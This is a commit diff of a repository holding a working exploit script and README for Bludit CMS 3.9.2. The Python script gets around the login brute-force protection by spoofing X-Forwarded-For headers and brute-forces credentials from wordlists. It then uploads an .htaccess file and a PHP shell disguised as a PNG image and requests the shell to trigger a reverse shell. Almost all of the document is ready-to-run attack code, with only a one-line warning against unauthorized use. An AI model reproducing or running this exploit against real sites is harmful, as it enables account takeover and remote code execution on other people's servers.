~nighthawk/bludit-3.9.2-brute-exploit

33ec4facbb4070bdf666c5d71b76d37b78bda6a7 — Frank Brodbeck 4 months ago 1986c7d master
script will now bruteforce and exploit bludit for uploading a reverse shell and trigger it
2 files changed, 106 insertions(+), 32 deletions(-)

M README.md
M bruteforce.py
M README.md => README.md +22 -1
@@ 1,1 1,22 @@
# Bludit-CMS-Version-3.9.2-Brute-Force-Protection-Bypass-script
\ No newline at end of file
Modified version of https://github.com/musyoka101/Bludit-CMS-Version-3.9.2-Brute-Force-Protection-Bypass-script

DO NOT USE THIS ON ENVIRONMENTS YOU ARE NOT ALLOWED TO PENTEST

The script takes new parameters:

* a list of usernames to bruteforce
* a shell to upload

```
nighthawk@attacker:~$ ./bruteforce.py 

[*] Attacking bludit @ http://198.51.100.1
[+] Starting bruteforce
[-] Trying: RolandDeschain
[-] SUCCESS: johndoe with password s3cr3t
[+] Starting exploitation
[-] Uploading .htaccess
[-] Dropping shell
[-] Calling home
[!] Thank you for flying with nighthawk.
```

M bruteforce.py => bruteforce.py +84 -31
@@ 1,44 1,97 @@
#!/usr/bin/env python3
import re
import requests
import uuid
import os

host = "http://127.0.0.1" # change to the appropriate URL
# XXX: should be arguments instead of hardcoded
#### CHANGE THESE
host = "http://198.51.100.1"
shell = ",/nighthawk.php"
inwordlist = "./wordlist"
inuserlist = "./users"

login_url = host + '/admin/login'
username = 'admin' # Change to the appropriate username
fname = "/home/admin/Desktop/test.txt" #change this to the appropriate file you can specify the full path to the file
with open(fname) as f:
    content = f.readlines()
    word1 = [x.strip() for x in content] 
wordlist = word1

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
# for debugging via burp
proxies = {
        #'http': 'http://localhost:8080'
}

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }
login_url = host + '/admin/'

def exploit(s, csrf, host, payload, headers, proxies):
    _uuid = uuid.uuid4().hex
    url = host+'/admin/ajax/upload-images'
    fn = os.path.basename(os.path.normpath(payload))
    
    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
        'uuid': _uuid,
        'tokenCSRF': csrf
    }
    
    print('[-] Uploading .htaccess')
    files = {
            'images[]': ('.htaccess', 'RewriteEngine Off', 'image/png')
    }
    r = s.post(url, headers = headers, files = files, data = data, allow_redirects = False, proxies = proxies)
    
    print('[-] Dropping shell')
    files = {
            'images[]': (fn, open(payload, 'rb'), 'image/png')
    }
    r = s.post(url, headers = headers, files = files, data = data, allow_redirects = False, proxies = proxies)
    
    print('[-] Calling home')
    r = s.get(host+'/bl-content/tmp/'+fn, allow_redirects = False, proxies = proxies)

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
# XXX: should be in a function
with open(inwordlist) as f:
    content = f.readlines()
    word1 = [x.strip() for x in content] 
wordlist = word1
with open(inuserlist) as f:
    content = f.readlines()
    word1 = [x.strip() for x in content] 
users = word1

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
print()
print('[*] Attacking bludit @ {t}'.format(t = host))
print('[+] Starting bruteforce')

for password in wordlist:
    print('[-] Trying: {p}'.format(p = password))
    
    for username in users:
        session = requests.Session()
        login_page = session.get(login_url)
        csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
        
        headers = {
            'X-Forwarded-For': str(uuid.uuid4()),
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
            'Referer': login_url
        }
        
        data = {
            'tokenCSRF': csrf_token,
            'username': username,
            'password': password,
            'save': ''
        }
        
        login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False, proxies = proxies)
        
        if 'location' in login_result.headers:
            if '/admin/dashboard' in login_result.headers['location']:
                print('[-] SUCCESS: {u} with password {p}'.format(u = username, p = password))
                print('[+] Starting exploitation')
                session.get(host+'/admin/dashboard', headers = headers, allow_redirects = False, proxies = proxies)
                r = session.get(host+'/admin/new-content', headers = headers, allow_redirects = False, proxies = proxies)
                csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', r.text).group(1)
                exploit(session, csrf_token, host, shell, headers, proxies)
                break
    else:
        continue
    break
print('[!] Thank you for flying with nighthawk.')
print()